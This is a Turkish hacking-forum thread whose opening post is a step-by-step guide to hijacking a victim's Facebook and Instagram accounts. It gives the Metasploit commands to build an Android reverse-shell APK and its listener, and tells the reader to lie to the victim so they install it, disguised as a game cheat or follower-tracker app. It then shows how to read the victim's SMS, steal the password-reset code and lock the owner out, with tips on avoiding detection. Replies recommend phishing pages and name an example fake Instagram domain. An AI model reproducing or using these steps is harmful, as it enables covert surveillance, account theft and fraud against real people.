[Facebook] ve [Instagram] --Hackleyin-- --Dev Konu--

Slown

Katılımcı Üye
12 Ara 2015
607
0
Zaton
Evet arkadaşlar herkes facebook nasıl hacklerim instagram nasıl hackliyecez diye konular paylaşmaya başladı bende kendi bulduğum yöntemle size bunu anlatmaya çalışacağım:) umarım faydalı olur

Gerkenler:
1-kali linux
2-kurbanın android telefonu olması gerekli..
3-kurbanın facesine telefon numarasıyla kayıt olmuş olması

Evet başlıyoruz. ilk önce kurbanın Telefonunu hacklememiz gerekli..

1.Adım: Komut satırını açıyoruz ve aşağıdaki kodu giriyoruz::

":~# msfpayload android/meterpreter/reverse_tcp LHOST=kendi-ip-adresinizLPORT=portnumarasınıgirin(8080 yada 4444) R > oluşacak apk ismi.apk"

eğer ip adresinizi bilmiyorsanız başka bir terminale ifconfig yazınız.

2.Adım: xxxx.apk dosyamız oluşturuldu home dizininde bulabilirsiniz. :D

3.Adım:Başka bir komut satırı açıyoruz ve msfconsole yazıyoruz.

4.Adım:M.e.t.a.s.p.l.o.i.t yüklenince aşağıdaki kodları yazmamız gerkli:

> use exploit/multi/handler
> set payload android/meterpreter/reverse_tcp
> set lhost 192.168.45.4 (adım 1 de kullandığınla aynı ip).
> set lport 8080 (adım 1 de kullandığınla aynı port).
> exploit

Şimdi konsol ip yi ve portu dinliyor.

5.Adım:Şimdi yapmamız gereken tek şey apk dosyamızı karşıya kopyalamak.

6.Adım:SM kullanarak karşıya yedirin ve indirip açmasını sağlamalıyız..
(Beyler sosyal mühendislik yaparken herkesin ilgi duyduğu birşey vardır mesela oyun hileleri yada beğeni yapma programları kim takip etti kim etmedi onu gösteren bir program. İşte sizin gönderdiğiniz programın da o olduğunu söyleyerek yalan söylemiliyiz..)

7.Adım:Program açılınca terminalde connected yazısını göreceksiniz.

8.Adım:Artık erişim iznine sahipiz :D Şimdi sadece kurbanın SMS lerini okumak kaldı :D.

(İsterseniz help yazarak başka neler yapabileceğinizi öğrenebilirsiniz..)

Tebrikler! İşin zor kısmını hallettik :)

"Facebook" ' u almaya sıra geldi..

Şimdi kurban kişinin "Facebook" ' unun kullanıcı adını öğrenmemiz gerekiyor.. Kurban kişinin profiline girerek www.fb.com/"Kullanıcı adı" öğrenebilirsiniz. Mesela kullanıcı adı "Slown" diyelim. Şifremi unuttum kısmına giriyoruz.. Bize hesabımızın kullanıcı adını yazmamızı istiyor (e-posta telefon numarası gibi şeyler de yazabilirsiniz..).. Evet hesabı nasıl kurtarmak istediğinizi soruyor.
1-Yöntem: E-postaya mail gönderek (Bunu yapamayız :D )
2-Yöntem +905xxxxxxxx numarasına doğrulama kodu gönderek

2.Yöntemi seçiyoruz. Ve deminden telefonu hacklediğiiz kişiye bir doğrulama kodu geliyor..

Şimdi yapmamız gereken terminalimize geri dönmek :D

"dump_sms" komutunu kullanarak karşı kişiye gelen doğrulama kodunu öğreniyoruz..

Sonra bizi bekleyen facebooka dönerek Doğrulama kodunu girerek şifreyi yeniliyoruz.. Yalnız dikkat etmemiz gereken bir olay var::=>>

Bu adımdan sonra size oturum açık mı kalsın yoksa diğer cihazlardan çıkış yapılsın mı diye bir soru soracak.. Çıkış yapı seçerseniz kurban hemen hesabını geri almaya çalışacaktır bu yüzden oturumu açık bırak Facebook kardeş diyoruz :D

evet kişinin facesi elimizde isterseniz telefon numarasını kaldırabilirsiniz e postasını yenileyebirsiniz bu sayede facebook sizde kalıcı olarak durur:D

Kurban kişinin facebookunu kullanarak istagram hesabına da giriş yapabilirsiniz.. :D Sonra facebook hesabını kaldırıp kendi facebook hesabınızı ekleyebilirsiniz..

Önemli Notlar...::

1- Exploit connected olduğu anda karşı tarafa sms göndermeyin beyler kurbanınız sizin onu hacklemeye çalıştığınızı çakabilir..

2-Oturum açık kalsın demenizi tavsiye ediyorum sonra isterseniz bunu ayarlayabilirsiniz.. Eğer kurban facebook ayarlarından başka birisi faceme girerse beni uyar ayarlarını yaptıysa sıkıntıya düşebilirsiniz..

3- Konu tamamiyle bana ait değildir yöntemi bulan benim :D kod konusunda arkadaşımdan yardım aldım kendisinin de çektiği video ya burdan ulaşabilirsiniz::
[ame]https://www.youtube.com/watch?v=Ie-IQzPfMG8[/ame]

4-İşinize yararsa ne mutlu bana yorum olarak sorularınız belirtebilirsiniz.. :))

5-Benim android telefonum olmadığı için görsel olarak destek olamadım beyler ama görsel olarak yardımcı olucak birisi olursa mutlu olurum..

6-
eline sağlık
kalinin yeni sürümünde msfpayload yerine msfvenom komutu kullanılmaya başlanmıştır hata alan arkadaş olursa msfvenom ile denesin :)

7-
Fake script sürekli yedirmen gerekir ama bunu kurbana bi defa yedirdinmi doğrulama koduna sürekli ulaşabilirsin

8-
Eline saglık arkadaşlar toolar çalışmassa güncellemeyi deneyin 2.0 da apt-sudo komutu ile

9-Konu eğitim ve kendini güvenliğinizi sağlamak amacı ile açılmıştır sorumluluk kullanan şahsa aittir :)

10-Bu yöntemi uygulanırken kişinin tel numarasını vs . bilmeye gerek yok beyler sadece kurbana yaptığımız apk yi yedirmeliyiz..

11- İlk önce kurbanın face şifresini yenilemeyi deneyin eğer orda tel no ile şifre yenileme kısmı yoksa boşuna bu işlemleri yapmayın

12- Tavsiye olarak kurbana apk yi yedirdikten sonra akşam kurbanın uyumasını bekleyin o uyuduktan sonra daha rahat olursunuz ..

Son düzenleme:

dragatla

Katılımcı Üye
6 Ocak 2013
661
0
Teşekkürler ama direk fake script sitesi versek daha kolay olmaz mı ? 2sindede sm gerekiyor
örn:iintagram.pe.hu

Slown

Katılımcı Üye
12 Ara 2015
607
0
Zaton
Teşekkürler ama direk fake script sitesi versek daha kolay olmaz mı ? 2sindede sm gerekiyor
örn:iintagram.pe.hu

dostum haklısın ama herkes artık o yönteme inanmıyor bende böyle bir yöntem paylaşmak istedim :) hemde sm bunda daha kolay adamın ilgisini kullanarak onu hackliyoruz iş tamam

aslan4111

Kıdemli Üye
19 Ağu 2016
3,492
8
Güzel paylaşım da yine bunun yerine fake script kullansak iyi olur.Sonuçta kim artık tel numarasını sosyal medya hesabına kayıt ediyor ki ?

Slown

Katılımcı Üye
12 Ara 2015
607
0
Zaton
Güzel paylaşım da yine bunun yerine fake script kullansak iyi olur.Sonuçta kim artık tel numarasını sosyal medya hesabına kayıt ediyor ki ?

Tel numarası vermeden faceye kayıt olunmuyor zaten msjlaşmak için sana zorunlu olarak face messengeri indirtiyor onu da tel numarasını girmeden kullanamıyorsun

[NEO]

Kıdemli Üye
14 Nis 2013
2,929
12
eline sağlık
kalinin yeni sürümünde msfpayload yerine msfvenom komutu kullanılmaya başlanmıştır hata alan arkadaş olursa msfvenom ile denesin :)

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.